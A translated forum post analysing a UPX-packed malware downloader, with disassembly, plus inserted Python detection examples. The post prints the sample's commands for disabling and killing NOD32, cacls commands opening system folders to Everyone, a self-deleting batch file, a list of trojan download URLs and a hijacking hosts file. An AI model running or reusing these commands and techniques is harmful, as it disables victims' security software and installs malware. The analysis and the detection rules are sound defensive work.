Incomplete analysis of a certain downloader
I posted this on kingzoo earlier; I'm new to 吾爱 (52pojie), so I'm bringing some material over, heh heh... 【Title】: Incomplete analysis of a certain downloader
【Author】: 长江小七
【Software】: a certain downloader (malware)
【Packer】: UPX
【Language】: VC6.0
【Tools】: OD (OllyDbg), SSM
【Platform】: Windows XP SP2
【Description】: drops a malware file and a driver file, then downloads a large batch of trojans
【Author's note】: done purely out of interest, with no other purpose. Corrections from the experts are welcome!
See the attachment for the sample (already unpacked)
This is my first malware analysis and my fundamentals are weak; if there are errors or omissions, please point them out. Thanks!
UPX packer, unpacked easily with the ESP trick. PEiD shows it was written in VC6.0.
After unpacking there seems to be a lot of junk code; I don't know how to strip it (I'm a noob, nothing to be done), so I pressed on with the analysis.
1. Calls FindWindowA to check whether a window whose title is the string "TTe.er.eabcds.ss" (the ASCII string below) has popped up. If one is found it takes that to mean it has been flagged by antivirus, and exits.
00402369 >push 004012C8 ; tte.er.eabcds.ss
0040236E >call dword ptr [<&USER32.FindWindowA>>; USER32.FindWindowA
00402374 >mov dword ptr , eax
0040237A >cmp dword ptr , 0
00402381 >je 0040241D
2. Kills NOD32 (I suspect; NOD32 surely isn't this fragile??? Not tested, so I don't know~) by running:
cmd /c sc config ekrn start= disabled
cmd.exe /c taskkill.exe /im ekrn.exe
cmd.exe /c taskkill.exe /im egui.exe
3. Extracts the resource named server from its own resource section, drops killdll.dll into the WINDOWS directory, and then
runs the command line: C:\WINDOWS\system32\rundll32.exe C:\WINDOWS\killdll.dll testall
to load itself.
4. Calls GetTickCount and uses the uptime value to build an EXE name in the WINDOWS directory (on my machine:
C:\WINDOWS\28720812_xeex.exe), then calls ShellExecuteA to run 28720812_xeex.exe.
0040295C >call dword ptr [<&kernel32.GetTickCou>; kernel32.GetTickCount
00402962 >push eax
00402963 >lea edx, dword ptr
00402969 >push edx
0040296A >push 00401294 ; %s%d_xeex.exe
0040296F >lea eax, dword ptr
00402975 >push eax
00402976 >call dword ptr [<&USER32.wsprintfA>]; USER32.wsprintfA
0040297C >add esp, 10
0040297F >push 0FF
00402984 >lea ecx, dword ptr
0040298A >push ecx
0040298B >call dword ptr [<&kernel32.GetWindows>; kernel32.GetWindowsDirectoryA
00402991 >push 0040123C ; \
00402996 >lea edx, dword ptr
0040299C >push edx
0040299D >call dword ptr [<&kernel32.lstrcat>]; kernel32.lstrcatA
004029A3 >lea eax, dword ptr
004029A9 >push eax
004029AA >lea ecx, dword ptr
004029B0 >push ecx
004029B1 >call dword ptr [<&kernel32.lstrcat>]; kernel32.lstrcatA
004029B7 >push 004012C0 ; server
004029BC >push 65
004029BE >lea edx, dword ptr
004029C4 >push edx
004029C5 >call 00401650
004029CA >push 0FF
004029CF >lea eax, dword ptr
004029D5 >push eax
004029D6 >call dword ptr [<&kernel32.GetWindows>; kernel32.GetWindowsDirectoryA
004029DC >push 0040123C ; \
004029E1 >lea ecx, dword ptr
004029E7 >push ecx
004029E8 >call dword ptr [<&kernel32.lstrcat>]; kernel32.lstrcatA
004029EE >lea edx, dword ptr
004029F4 >push edx
004029F5 >lea eax, dword ptr
004029FB >push eax
004029FC >call dword ptr [<&kernel32.lstrcat>]; kernel32.lstrcatA
00402A02 >push 0
00402A04 >push 0
00402A06 >push 0
00402A08 >lea ecx, dword ptr
00402A0E >push ecx
00402A0F >push 0040128C ; open
00402A14 >push 0
00402A16 >call dword ptr [<&SHELL32.ShellExecut>; SHELL32.ShellExecuteA ; runs 28720812_xeex.exe
00402A1C >push 1F4
00402A21 >call dword ptr [<&kernel32.Sleep>] ; kernel32.Sleep
5. Drops the driver pcidump.sys and installs it as a service
Registry key: HKLM\SYSTEM\CurrentControlSet\Services\PCIDump
Registry value: Start
New value:
Type: REG_DWORD
Value: 00000003
00401C7A 6A 00 push 0
00401C7C 6A 00 push 0
00401C7E 6A 00 push 0
00401C80 6A 00 push 0
00401C82 6A 00 push 0
00401C84 8B4D 08 mov ecx, dword ptr
00401C87 51 push ecx
00401C88 6A 00 push 0
00401C8A 6A 03 push 3
00401C8C 6A 01 push 1
00401C8E 68 FF010F00 push 0F01FF
00401C93 68 40124000 push 00401240 ; ASCII "pcidump"
00401C98 68 40124000 push 00401240 ; ASCII "pcidump"
00401C9D 8B55 FC mov edx, dword ptr
00401CA0 52 push edx
00401CA1 FF15 DC384000 call dword ptr ; ADVAPI32.CreateServiceA
00401CA7 8945 C8 mov dword ptr , eax
00401CAA 837D C8 00 cmp dword ptr , 0
00401CAE 75 7F jnz short 00401D2F
00401CB0 68 FF010F00 push 0F01FF
00401CB5 68 40124000 push 00401240 ; ASCII "pcidump"
00401CBA 8B45 F4 mov eax, dword ptr
00401CBD 50 push eax
00401CBE FF15 E4384000 call dword ptr ; ADVAPI32.OpenServiceA
00401CC4 8945 D4 mov dword ptr , eax
00401CC7 8B4D D4 mov ecx, dword ptr
00401CCA 894D F8 mov dword ptr , ecx
00401CCD 837D D4 00 cmp dword ptr , 0
00401CD1 74 24 je short 00401CF7
00401CD3 8D55 D8 lea edx, dword ptr
00401CD6 52 push edx
00401CD7 6A 01 push 1
00401CD9 8B45 D4 mov eax, dword ptr
00401CDC 50 push eax
00401CDD FF15 E0384000 call dword ptr ; ADVAPI32.ControlService
00401CE3 8B4D F8 mov ecx, dword ptr
00401CE6 51 push ecx
00401CE7 FF15 D4384000 call dword ptr ; ADVAPI32.DeleteService
00401CED 8B55 F8 mov edx, dword ptr
00401CF0 52 push edx
00401CF1 FF15 D8384000 call dword ptr ; ADVAPI32.CloseServiceHandle
00401CF7 6A 00 push 0
00401CF9 6A 00 push 0
00401CFB 6A 00 push 0
00401CFD 6A 00 push 0
00401CFF 6A 00 push 0
00401D01 8B45 08 mov eax, dword ptr
00401D04 50 push eax
00401D05 6A 00 push 0
00401D07 6A 03 push 3
00401D09 6A 01 push 1
00401D0B 68 FF010F00 push 0F01FF
00401D10 68 40124000 push 00401240 ; ASCII "pcidump"
00401D15 68 40124000 push 00401240 ; ASCII "pcidump"
00401D1A 8B4D F4 mov ecx, dword ptr
00401D1D 51 push ecx
00401D1E FF15 DC384000 call dword ptr ; ADVAPI32.CreateServiceA
00401D24 8945 C8 mov dword ptr , eax
00401D27 837D C8 00 cmp dword ptr , 0
00401D2B 75 02 jnz short 00401D2F
00401D2D EB 74 jmp short 00401DA3
00401D2F 8B55 C8 mov edx, dword ptr
00401D32 52 push edx
00401D33 FF15 D8384000 call dword ptr ; ADVAPI32.CloseServiceHandle
00401D39 6A 10 push 10
00401D3B 68 40124000 push 00401240 ; ASCII "pcidump"
00401D40 8B45 F4 mov eax, dword ptr
00401D43 50 push eax
00401D44 FF15 E4384000 call dword ptr ; ADVAPI32.OpenServiceA
00401D4A 8945 C0 mov dword ptr , eax
00401D4D 8B4D C0 mov ecx, dword ptr
00401D50 894D CC mov dword ptr , ecx
00401D53 837D C0 00 cmp dword ptr , 0
00401D57 74 27 je short 00401D80
00401D59 6A 00 push 0
00401D5B 6A 00 push 0
00401D5D 8B55 C0 mov edx, dword ptr
00401D60 52 push edx
00401D61 FF15 D0384000 call dword ptr ; ADVAPI32.StartServiceA
00401D67 85C0 test eax, eax
00401D69 75 09 jnz short 00401D74
00401D6B FF15 24104000 call dword ptr [<&kernel32.GetLastErr>; ntdll.RtlGetLastWin32Error
00401D71 8945 D0 mov dword ptr , eax
00401D74 8B45 CC mov eax, dword ptr
00401D77 50 push eax
00401D78 FF15 D8384000 call dword ptr ; ADVAPI32.CloseServiceHandle
00401D7E EB 09 jmp short 00401D89
00401D80 FF15 24104000 call dword ptr [<&kernel32.GetLastErr>; ntdll.RtlGetLastWin32Error
00401D86 8945 D0 mov dword ptr , eax
00401D89 8B4D F4 mov ecx, dword ptr
00401D8C 51 push ecx
00401D8D FF15 D8384000 call dword ptr ; ADVAPI32.CloseServiceHandle
00401D93 EB 09 jmp short 00401D9E
00401D95 FF15 24104000 call dword ptr [<&kernel32.GetLastErr>; ntdll.RtlGetLastWin32Error
00401D9B 8945 D0 mov dword ptr , eax
00401D9E 8B45 D0 mov eax, dword ptr
00401DA1 EB 02 jmp short 00401DA5
00401DA3^ EB DB jmp short 00401D80
00401DA5 5F pop edi
00401DA6 5E pop esi
00401DA7 5B pop ebx
00401DA8 8BE5 mov esp, ebp
00401DAA 5D pop ebp
00401DAB C3 retn
6. Copies itself into the system32 directory under the name scvhost.exe
00402FCF 6A 00 push 0
00402FD1 8D8D 00FFFFFF lea ecx, dword ptr
00402FD7 51 push ecx
00402FD8 8D95 C0F9FFFF lea edx, dword ptr
00402FDE 52 push edx
00402FDF FF15 40104000 call dword ptr [<&kernel32.CopyFileA>>; kernel32.CopyFileA
7. Creates _uok.bat in the Windows directory, used to delete itself
The batch file reads:
:Repeat
del "C:\DOCUME~1\ADMINI~1\桌面\复件VI~1.EXE"
if exist "C:\DOCUME~1\ADMINI~1\桌面\复件VI~1.EXE" goto Repeat
rmdir C:\DOCUME~1\ADMINI~1\桌面
del "C:\WINDOWS\_uok.bat"
00401805 BF 10154000 mov edi, 00401510 ; _uok.bat
0040180A 8D95 FCFEFFFF lea edx, dword ptr
00401810 83C9 FF or ecx, FFFFFFFF
00401813 33C0 xor eax, eax
00401815 F2:AE repne scas byte ptr es:
00401817 F7D1 not ecx
00401819 2BF9 sub edi, ecx
0040181B 8BF7 mov esi, edi
0040181D 8BD9 mov ebx, ecx
0040181F 8BFA mov edi, edx
OK, the main program is done~
Next, 28720812_xeex.exe
1. Creates the mutex "XETTETT......"; if it already exists, it exits, so the malware does not run twice.
00400920 >/$55 push ebp
00400921|.8BEC mov ebp, esp
00400923|.81EC 1C050000 sub esp, 51C
00400929|.57 push edi
0040092A|.33FF xor edi, edi
0040092C|.68 68274000 push 00402768 ; /MutexName = "XETTETT......"
00400931|.57 push edi ; |InitialOwner => FALSE
00400932|.57 push edi ; |pSecurity => NULL
00400933|.FF15 3C044000 call dword ptr [<&KERNEL32.CreateMute>; \CreateMutexA
00400939|.FF15 10044000 call dword ptr [<&KERNEL32.GetLastErr>; [GetLastError
0040093F|.3D B7000000 cmp eax, 0B7
00400944|.75 07 jnz short 0040094D
2. Changes the NTFS permissions on the following folders, in preparation for hiding and downloading malware:
cmd /c cacls C:\WINDOWS\system32 /e /p everyone:f
cmd /c cacls ""C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\"" /e /p everyone:f
Modifies a registry value so the malware runs at startup:
Registry key: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Registry value: RsTray
Type: REG_SZ
Value: C:\WINDOWS\system32\scvhost.exe
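The AV-tampering commands in step 2 of the main program, the rundll32 load of killdll.dll (step 3), the GetTickCount-named executable (step 4), the _uok.bat self-delete (step 7) and the two cacls commands just above all surface as process command lines. As an added detection example (not code from the original post or from the sample), the Python below runs a few regex rules over constructed process-creation log lines that mirror those commands and tags the hits that target the antivirus processes named in the analysis. The log lines, the rule names and the AV_SERVICES / AV_PROCESSES watchlists are my own assumptions.

```python
import re

# Constructed process-creation log lines (my own, not from the page's sample run);
# the malicious ones mirror the command lines listed in the analysis above.
SAMPLE_EVENTS = [
    'cmd /c sc config ekrn start= disabled',
    'cmd.exe /c taskkill.exe /im ekrn.exe',
    'cmd.exe /c taskkill.exe /im egui.exe',
    'C:\\WINDOWS\\system32\\rundll32.exe C:\\WINDOWS\\killdll.dll testall',
    'C:\\WINDOWS\\28720812_xeex.exe',
    'cmd /c cacls C:\\WINDOWS\\system32 /e /p everyone:f',
    'cmd /c cacls ""C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\"" /e /p everyone:f',
    'cmd /c C:\\WINDOWS\\_uok.bat',
    'C:\\WINDOWS\\system32\\notepad.exe C:\\notes.txt',  # benign
    'sc config wuauserv start= auto',                     # benign
]

# NOD32's service and GUI process, as named in the analysis (assumed watchlists;
# add your own vendor's names here).
AV_SERVICES = {'ekrn'}
AV_PROCESSES = {'ekrn.exe', 'egui.exe'}

# Each rule captures the interesting operand in group 1.
RULES = [
    ('service_disabled',
     re.compile(r'\bsc(?:\.exe)?\s+config\s+(\S+)\s+start=\s*disabled\b', re.I)),
    ('process_killed',
     re.compile(r'\btaskkill(?:\.exe)?\b.*?/im\s+(\S+)', re.I)),
    ('acl_opened_to_everyone',
     re.compile(r'\bcacls(?:\.exe)?\s+(.+?)\s+/e\s+/p\s+everyone:f\b', re.I)),
    ('dll_loaded_from_windows_root',
     re.compile(r'\brundll32(?:\.exe)?\s+([A-Z]:\\WINDOWS\\[^\\\s]+\.dll)\b', re.I)),
    ('tickcount_named_exe',
     re.compile(r'\\(\d+_xeex\.exe)\b', re.I)),
    ('self_delete_batch',
     re.compile(r'\\(_uok\.bat)\b', re.I)),
]


def scan(events):
    """Return one finding dict per (event, rule) match."""
    findings = []
    for cmdline in events:
        for rule, pattern in RULES:
            m = pattern.search(cmdline)
            if not m:
                continue
            detail = m.group(1).strip('"').lower()
            # Only the service/process rules can name an AV component directly.
            av_target = (rule == 'service_disabled' and detail in AV_SERVICES) or \
                        (rule == 'process_killed' and detail in AV_PROCESSES)
            findings.append({'cmdline': cmdline, 'rule': rule,
                             'detail': detail, 'av_target': av_target})
    return findings


def summarize(findings):
    """Count hits per rule for a quick triage view."""
    counts = {}
    for f in findings:
        counts[f['rule']] = counts.get(f['rule'], 0) + 1
    return counts


if __name__ == '__main__':
    for f in scan(SAMPLE_EVENTS):
        flag = ' [AV target]' if f['av_target'] else ''
        print(f"{f['rule']:<30} {f['detail']}{flag}")
```

The two benign lines (notepad, and `sc config ... start= auto`) produce no findings, which is the point of anchoring the rules on `start= disabled` and on the `everyone:f` grant rather than on `sc` or `cacls` alone.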
00400A45|.50 push eax ; /Buffer
00400A46|.56 push esi ; |BufSize
00400A47|.FF15 24044000 call dword ptr [<&KERNEL32.GetTempPathA>; \GetTempPathA
00400A4D|.8D85 F0FDFFFF lea eax, dword ptr
00400A53|.50 push eax ; /<%s>
00400A54|.8D85 ECFCFFFF lea eax, dword ptr ; |
00400A5A|.68 00274000 push 00402700 ; |format = "cmd /c cacls ""%s"" /e /p everyone:f"
00400A5F|.50 push eax ; |s
00400A60|.FF15 F0044000 call dword ptr [<&MSVCRT.sprintf>] ; \sprintf
00400A66|.83C4 0C add esp, 0C
00400A69|.8D85 ECFCFFFF lea eax, dword ptr
00400A6F|.57 push edi
00400A70|.50 push eax
00400A71|.FFD3 call ebx
00400A73|.E8 15FDFFFF call 0040078D
00400A78|.E8 43030000 call 00400DC0 ; creates the registry value
3. Determines the operating system
00400AF2|.50 push eax ; /pVersionInformation
00400AF3|.FF15 40044000 call dword ptr [<&KERNEL32.GetVersionExA>; \GetVersionExA
00400AF9|.83BD 74FFFFFF>cmp dword ptr , 2
00400B00|.75 20 jnz short 00400B22
00400B02|.83BD 68FFFFFF>cmp dword ptr , 5
00400B09|.72 25 jb short 00400B30
00400B0B|.83BD 6CFFFFFF>cmp dword ptr , 0
00400B12|.75 07 jnz short 00400B1B
00400B14|.B8 88274000 mov eax, 00402788 ;win2000
00400B19|.C9 leave
00400B1A|.C3 retn
00400B1B|>B8 80274000 mov eax, 00402780 ;winxp
00400B20|.C9 leave
00400B21|.C3 retn
00400B22|>83BD 74FFFFFF>cmp dword ptr , 1
00400B29|.75 05 jnz short 00400B30
00400B2B|.B8 78274000 mov eax, 00402778 ;win9x
00400B30|>C9 leave
00400B31\.C3 retn
4. Visits http://8884.cc/1/Count.asp (presumably to count infected machines);
decrypts a string (the malware download list); the decrypted result is: http://ohyes88.com/xin/xx.txt
00400FCF|.8D85 4CFEFFFF lea eax, dword ptr
00400FD5|.68 08244000 push 00402408 ; /src = "H7CX26h`Ez[aZPeOA3u:ZQKcRTrOGxI
[onQaUOlNr@SmWppVk@6[WCCC"
00400FDA|.50 push eax ; |dest
00400FDB|.E8 B2060000 call <jmp.&MSVCRT.strcpy> ; \strcpy
00400FE0|.83C4 44 add esp, 44
00400FE3|.8D85 4CFBFFFF lea eax, dword ptr
00400FE9|.50 push eax
00400FEA|.8D85 4CFEFFFF lea eax, dword ptr
00400FF0|.50 push eax ; /s
00400FF1|.E8 96060000 call <jmp.&MSVCRT.strlen> ; \strlen
00400FF6|.59 pop ecx
00400FF7|.50 push eax
00400FF8|.8D85 4CFEFFFF lea eax, dword ptr
00400FFE|.50 push eax
00400FFF|.E8 4DF7FFFF call 00400751
00401004|.8D85 4CFDFFFF lea eax, dword ptr
0040100A|.50 push eax
0040100B|.8D85 4CFBFFFF lea eax, dword ptr
00401011|.50 push eax
00401012|.E8 E7F5FFFF call 004005FE
00401017|.8D85 4CFCFFFF lea eax, dword ptr
0040101D|.50 push eax
0040101E|.8D85 4CFDFFFF lea eax, dword ptr
00401024|.50 push eax
00401025|.E8 81F6FFFF call 004006AB
0040102A|.8D85 4CFCFFFF lea eax, dword ptr
00401030|.50 push eax ; malware list: /src = "http://ohyes88.com/xin/xx.txt"
00401031|.8D85 BCF9FFFF lea eax, dword ptr ; |
00401037|.50 push eax ; |dest
00401038|.E8 55060000 call <jmp.&MSVCRT.strcpy> ; \strcpy
0040103D|.83C4 24 add esp, 24
5. Fetches the malware file list and downloads the following:
1:http://2009kabasiji.com/xiao/aa1.exe
1:http://2009kabasiji.com/xiao/aa2.exe
1:http://2009kabasiji.com/xiao/aa3.exe
1:http://2009kabasiji.com/xiao/aa4.exe
1:http://2009kabasiji.com/xiao/aa5.exe
1:http://2009kabasiji.com/xiao/aa6.exe
1:http://2009kabasiji.com/xiao/aa7.exe
1:http://2009kabasiji.com/xiao/aa8.exe
1:http://2009kabasiji.com/xiao/aa9.exe
1:http://2009kabasiji.com/xiao/aa10.exe
1:http://2009kabasiji.com/xiao/aa11.exe
1:http://2009kabasiji.com/xiao/aa12.exe
1:http://2009kabasiji.com/xiao/aa13.exe
1:http://2009kabasiji.com/xiao/ktv14.exe
1:http://2009kabasiji.com/xiao/aa15.exe
1:http://2009kabasiji.com/xiao/aa16.exe
1:http://2009kabasiji.com/xiao/aa17.exe
1:http://2009kabasiji.com/xiao/good18.exe
1:http://2009kabasiji.com/xiao/aa19.exe
1:http://2009kabasiji.com/xiao/aa20.exe
1:http://2009kabasiji.com/xiao/aa21.exe
1:http://2009kabasiji.com/xiao/aa22.exe
1:http://2009kabasiji.com/xiao/aa23.exe
1:http://2009kabasiji.com/xiao/aa24.exe
1:http://2009kabasiji.com/xiao/aa25.exe
1:http://2009kabasiji.com/xiao/aa26.exe
1:http://2009kabasiji.com/xiao/aa29.exe
1:http://2009kabasiji.com/xiao/aa30.exe
1:http://2009kabasiji.com/xiao/mei33.exe
1:http://2009kabasiji.com/xiao/aa34.exe
into the temporary folder C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\U7YRQDIL
6. Downloads http://ohyes88.com/xin/host.jpg into the temporary folder, sets it read-only, and appends its contents to the local hosts file.
The contents of host.jpg are:
127.0.0.1 v.onondown.com.cn
127.0.0.2 ymsdasdw1.cn
127.0.0.3 h96b.info
127.0.0.0 fuck.zttwp.cn
127.0.0.0 www.hackerbf.cn
127.0.0.0 zzz.2008wyt.net
127.1.1.1 999.2005wyt.com
127.1.1.1 219.152.120.240
127.0.0.0 ww.popdm.cn
127.1.1.1 bbt.etimes888.com
127.1.1.1 219.147.13.53
127.1.1.1 a1.xxoozjz.com:56868
127.1.1.1 a1.xxoozjz.com
127.1.1.1 ddown.xxoozjz.com:56868
127.1.1.1 ddown.xxoozjz.com
127.1.1.1 dnl-13.geo.kaspersky.com
127.1.1.1 dl.360safe.com
127.1.1.1 www.sunlight.org.cn
127.1.1.1 w.wonthe.cn
127.1.1.1 20068080.cn
127.1.1.1 l.neter888.cn
127.1.1.1 stat.untang.com
127.1.1.1 www.ikdy.cn
127.0.0.0 geekbyfeng.cn
127.0.0.0 121.14.101.68
127.0.0.0 ppp.etimes888.com
127.0.0.0 www.bypk.com
127.0.0.0 CSC3-2004-crl.verisign.com
127.0.0.1 va9sdhun23.cn
127.0.0.0 udp.hjob123.com
127.1.1.1 999.hfdy2828.com
127.1.1.1 www.hfdy2929.com
127.1.1.1 www.xiazaide1.cn
127.1.1.1 www.vuf51579.cn
127.1.1.1 wm.eo2q.cn
127.1.1.1 d.www-263.com
127.1.1.1 www.ssy1688.cn
127.1.1.1 121.12.173.218
127.1.1.1 qq.18i16.net
127.1.1.1 a.baidu-6661.com
127.1.1.1 www.vuf51579.cn
127.1.1.1 www.1079223105.cn
127.1.1.1 home.xzx6.cn
127.1.1.1 top.fgc3.cn
127.1.1.1 165.246.44.228
127.1.1.1 wwww.ttfafa.com
127.1.1.1 pa.tt-09.com
127.0.0.2 bnasnd83nd.cn
127.0.0.0 www.gamehacker.com.cn
127.0.0.0 gamehacker.com.cn
127.1.1.1 www.cctv-100008.cn
127.1.1.1 222.73.208.141
127.0.0.3 adlaji.cn
127.1.1.1 aiyyw.com
127.0.0.1 858656.com
127.1.1.1 bnasnd83nd.cn
127.0.0.1 my123.com
127.0.0.0 user1.12-27.net
127.0.0.1 8749.com
127.0.0.0 fengent.cn
127.0.0.1 4199.com
127.0.0.1 user1.16-22.net
127.0.0.1 7379.com
127.0.0.1 2be37c5f.3f6e2cc5f0b.com
127.0.0.1 7255.com
127.0.0.1 user1.23-12.net
127.0.0.1 3448.com
127.0.0.1 www.guccia.net
127.0.0.1 7939.com
127.0.0.1 a.o1o1o1.nEt
127.0.0.1 8009.com
127.0.0.1 user1.12-73.cn
127.0.0.1 piaoxue.com
127.0.0.1 3n8nlasd.cn
127.0.0.1 kzdh.com
127.0.0.0 www.sony888.cn
127.0.0.1 about.blank.la
127.0.0.0 user1.asp-33.cn
127.0.0.1 6781.com
127.0.0.0 www.netkwek.cn
127.0.0.1 7322.com
127.0.0.0 ymsdkad6.cn
127.0.0.1 localhost
127.0.0.0 www.lkwueir.cn
127.0.0.1 06.jacai.com
127.0.1.1 user1.23-17.net
127.0.0.1 1.jopenkk.com
127.0.0.0 upa.luzhiai.net
127.0.0.1 1.jopenqc.com
127.0.0.0 www.guccia.net
127.0.0.1 1.joppnqq.com
127.0.0.0 4m9mnlmi.cn
127.0.0.1 1.xqhgm.com
127.0.0.0 mm119mkssd.cn
127.0.0.1 100.332233.com
127.0.0.0 61.128.171.115:8080
127.0.0.1 121.11.90.79
127.0.0.0 www.1119111.com
127.0.0.1 121565.net
127.0.0.0 win.nihao69.cn
127.0.0.1 125.90.88.38
127.0.0.1 16888.6to23.com
127.0.0.1 2.joppnqq.com
127.0.0.0 puc.lianxiac.net
127.0.0.1 204.177.92.68
127.0.0.0 pud.lianxiac.net
127.0.0.1 210.74.145.236
127.0.0.0 210.76.0.133
127.0.0.1 219.129.239.220
127.0.0.0 61.166.32.2
127.0.0.1 219.153.40.221
127.0.0.0 218.92.186.27
127.0.0.1 219.153.46.27
127.0.0.0 www.fsfsfag.cn
127.0.0.1 219.153.52.123
127.0.0.0 ovo.ovovov.cn
127.0.0.1 221.195.42.71
127.0.0.0 dw.com.com
127.0.0.1 222.73.218.115
127.0.0.1 203.110.168.233:80
127.0.0.1 3.joppnqq.com
127.0.0.1 203.110.168.221:80
127.0.0.1 363xx.com
127.0.0.1 www1.ip10086.com.cm
127.0.0.1 4199.com
127.0.0.1 blog.ip10086.com.cn
127.0.0.1 43242.com
127.0.0.1 www.ccji68.cn
127.0.0.1 5.xqhgm.com
127.0.0.0 t.myblank.cn
127.0.0.1 520.mm5208.com
127.0.0.0 x.myblank.cn
127.0.0.1 59.34.131.54
127.0.0.1 210.51.45.5
127.0.0.1 59.34.198.228
127.0.0.1 www.ew1q.cn
127.0.0.1 59.34.198.88
127.0.0.1 59.34.198.97
127.0.0.1 60.190.114.101
127.0.0.1 60.190.218.34
127.0.0.0 qq-xing.com.cn
127.0.0.1 60.191.124.252
127.0.0.1 61.145.117.212
127.0.0.1 61.157.109.222
127.0.0.1 75.126.3.216
127.0.0.1 220.250.64.21
127.0.0.1 75.126.3.217
127.0.0.1 75.126.3.218
127.0.0.0 59.125.231.177:17777
127.0.0.1 75.126.3.220
127.0.0.1 75.126.3.221
127.0.0.1 75.126.3.222
127.0.0.1 772630.com
127.0.0.1 832823.cn
127.0.0.1 8749.com
127.0.0.1 888.jopenqc.com
127.0.0.1 89382.cn
127.0.0.1 8v8.biz
127.0.0.1 97725.com
127.0.0.1 9gg.biz
127.0.0.1 www.9000music.com
127.0.0.1 test.591jx.com
127.0.0.1 a.topxxxx.cn
127.0.0.1 picon.chinaren.com
127.0.0.1 www.5566.net
127.0.0.1 p.qqkx.com
127.0.0.1 news.netandtv.com
127.0.0.1 z.neter888.cn
127.0.0.1 b.myblank.cn
127.0.0.1 wvw.wokutu.com
127.0.0.1 unionch.qyule.com
127.0.0.1 www.qyule.com
127.0.0.1 it.itjc.cn
127.0.0.1 www.linkwww.com
127.0.0.1 vod.kaicn.com
127.0.0.1 www.tx8688.com
127.0.0.1 b.neter888.cn
127.0.0.1 promote.huanqiu.com
127.0.0.1 www.huanqiu.com
127.0.0.1 www.haokanla.com
127.0.0.1 play.unionsky.cn
127.0.0.1 www.52v.com
127.0.0.1 www.gghka.cn
127.0.0.1 icon.ajiang.net
127.0.0.1 new.ete.cn
127.0.0.1 www.stiae.cn
127.0.0.1 o.neter888.cn
127.0.0.1 comm.jinti.com
127.0.0.1 www.google-analytics.com
127.0.0.1 hz.mmstat.com
127.0.0.1 www.game175.cn
127.0.0.1 x.neter888.cn
127.0.0.1 z.neter888.cn
127.0.0.1 p.etimes888.com
127.0.0.1 hx.etimes888.com
127.0.0.1 abc.qqkx.com
127.0.0.1 dm.popdm.cn
127.0.0.1 www.yl9999.com
127.0.0.1 www.dajiadoushe.cn
127.0.0.1 v.onondown.com.cn
127.0.0.1 www.interoo.net
127.0.0.1 bally1.bally-bally.net
127.0.0.1 www.bao5605509.cn
127.0.0.1 www.rty456.cn
127.0.0.1 www.werqwer.cn
127.0.0.1 1.360-1.cn
127.0.0.1 user1.23-16.net
127.0.0.1 www.guccia.net
127.0.0.1 www.interoo.net
127.0.0.1 upa.netsool.net
127.0.0.1 js.users.51.la
127.0.0.1 qq.gong2008.com
127.0.0.1 2008tl.copyip.com
127.0.0.1 tla.laozihuolaile.cn
127.0.0.1 www.tx6868.cn
127.0.0.1 p001.tiloaiai.com
127.0.0.1 s1.tl8tl.com
127.0.0.1 s1.gong2008.com
127.0.0.1 4b3ce56f9g.3f6e2cc5f0b.com
127.0.0.1 2be37c5f.3f6e2cc5f0b.com
222.189.238.6 biz5c.sandai.net
222.189.238.6 recommend.xunlei.com
222.189.238.6 news.51uc.com
222.189.238.6 chat.sina.com.cn
222.189.238.6 hallcenter.ourgame.com
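Two things stand out in the dropped hosts list: antivirus update hosts and a VeriSign CRL host are pointed at 127.x addresses (which silently blocks AV updates and certificate revocation checks), while the last few entries send popular download and chat sites to one external address, 222.189.238.6, which is a traffic hijack rather than a sinkhole. As an added example, not code from the original post, the Python below parses a constructed excerpt of host.jpg and sorts the entries into those buckets. The SECURITY_WATCHLIST suffix list is an assumption to extend with your own vendors, and entries carrying a :port suffix are reported as malformed because hosts files ignore them.

```python
import ipaddress

# Constructed excerpt of host.jpg (a handful of the lines listed above)
HOST_JPG_SAMPLE = """\
127.0.0.1 v.onondown.com.cn
127.1.1.1 dnl-13.geo.kaspersky.com
127.1.1.1 dl.360safe.com
127.0.0.0 CSC3-2004-crl.verisign.com
127.0.0.1 www.google-analytics.com
127.0.0.1 localhost
127.1.1.1 a1.xxoozjz.com:56868
222.189.238.6 biz5c.sandai.net
222.189.238.6 recommend.xunlei.com
222.189.238.6 chat.sina.com.cn
"""

# Domain suffixes whose sinkholing hurts a defender: AV update servers and the
# CA revocation-list host. Assumed watchlist; extend it with your own vendors.
SECURITY_WATCHLIST = ('kaspersky.com', '360safe.com', 'verisign.com')


def parse_hosts(text):
    """Yield (line_no, address_text, [names]) for each non-comment hosts line."""
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.split('#', 1)[0].strip()
        parts = line.split()
        if len(parts) >= 2:
            yield line_no, parts[0], parts[1:]


def audit_hosts(text):
    """Bucket every hosts entry by what it does to the victim's name resolution."""
    report = {'security_sinkholed': [], 'redirected': [],
              'other_loopback': [], 'malformed': []}
    for line_no, addr_text, names in parse_hosts(text):
        try:
            addr = ipaddress.ip_address(addr_text)
        except ValueError:
            report['malformed'].append((line_no, addr_text))
            continue
        for name in names:
            host = name.lower()
            if ':' in host:
                # hosts files carry no port; the resolver never matches this entry
                report['malformed'].append((line_no, name))
            elif host == 'localhost' and addr.is_loopback:
                continue  # the one loopback entry that belongs there
            elif not addr.is_loopback:
                # anything not in 127.0.0.0/8 sends the victim's traffic elsewhere
                report['redirected'].append((host, addr_text))
            elif host.endswith(SECURITY_WATCHLIST):
                report['security_sinkholed'].append((host, addr_text))
            else:
                report['other_loopback'].append((host, addr_text))
    return report


if __name__ == '__main__':
    for bucket, items in audit_hosts(HOST_JPG_SAMPLE).items():
        print(f'{bucket}: {len(items)}')
        for item in items:
            print('   ', *item)
```

`is_loopback` covers the whole 127.0.0.0/8 block, so 127.0.0.0 and 127.1.1.1 are treated the same as 127.0.0.1; the redirected bucket is the one to escalate first, because it points real services at an address the attacker controls.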
Killdll.dll isn't analysed in detail here: it terminates the processes of a number of common antivirus products and modifies
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options to hijack a long list of security products. The end~
Sample:
Archive password: 52pojie :)
Welcome, come by often.
Please post more malware analyses. As encouragement, this thread gets featured.
Still learning; hope to see more of the OP's analyses in future~~
